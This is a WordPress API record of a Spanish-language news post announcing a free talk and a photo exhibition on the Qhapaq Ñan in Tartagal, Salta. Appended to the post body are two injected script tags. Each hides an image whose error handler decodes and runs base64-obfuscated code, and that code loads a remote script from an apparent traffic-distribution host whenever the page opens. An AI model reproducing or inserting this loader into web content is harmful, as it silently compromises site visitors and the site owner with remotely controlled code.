{"id":1863,"date":"2022-11-28T11:34:48","date_gmt":"2022-11-28T14:34:48","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1863"},"modified":"2025-08-14T00:29:13","modified_gmt":"2025-08-14T03:29:13","slug":"muestra-fotografica-y-charla-gratuita-sobre-qhapaq-nan-en-tartagal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1863","title":{"rendered":"Muestra fotogr\u00e1fica y charla gratuita sobre Qhapaq \u00d1an en Tartagal"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#880526\"><em>Hoy llega a Tartagal la muestra de fotos \u201cSiguiendo las Huellas del Pasado\u201d y la charla gratuita \u201cQhapaq \u00d1an \u2013 Camino Ancestral, Patrimonio Mundial de Salta\u201d.<\/em><\/h4>\n\n\n\n<p>Ambas actividades tendr\u00e1n lugar en el Centro Cultural de los Pueblos Originarios de Tartagal, con el fin de continuar con la pol\u00edtica de difusi\u00f3n de nuestro patrimonio cultural en general, y Qhapaq \u00d1an en particular.<\/p>\n\n\n\n<p>La visita a Tartagal, se suma a las itinerancias de los \u00faltimos meses por Campo Santo, Cafayate, Cachi, Rosario de la Frontera, Met\u00e1n y Or\u00e1n con las muestras \u201cObras de Arte Premiadas\u201d, \u201cMemorias del Norte\u201d y \u201cG\u00fcemes Itinerante\u201d.<\/p>\n\n\n\n<p><strong>Cronograma actividades en Tartagal \/ Lunes 28 de noviembre \/ Centro Cultura de los Pueblos Originarios<\/strong><\/p>\n\n\n\n<p>&#8211; 18 H. Charla Gratuita \u201c\u201cQhapaq \u00d1an \u2013 Camino Ancestral, Patrimonio Mundial de Salta\u201d, a cargo del director general de Gesti\u00f3n Patrimonial Christian Vitry. Planta Alta del Centro.<\/p>\n\n\n\n<p>&#8211; 19 H. Inauguraci\u00f3n de la muestra fotogr\u00e1fica \u201cSiguiendo las Huellas del Pasado\u201d. Planta Baja del Centro.<\/p>\n\n\n\n<p>La entrada es gratuita y se invita a la comunidad y a los medios de prensa a participar.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy llega a Tartagal la muestra de fotos \u201cSiguiendo las Huellas del Pasado\u201d y la charla gratuita \u201cQhapaq \u00d1an \u2013 Camino Ancestral, Patrimonio Mundial de Salta\u201d. Ambas actividades tendr\u00e1n lugar en el Centro Cultural de los Pueblos Originarios de Tartagal, con el fin de continuar con la pol\u00edtica de difusi\u00f3n de nuestro patrimonio cultural en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1864,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,18],"tags":[],"class_list":{"0":"post-1863","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1863"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1863"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1863\/revisions"}],"predecessor-version":[{"id":7261,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1863\/revisions\/7261"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1864"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1863"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1863"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1863"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}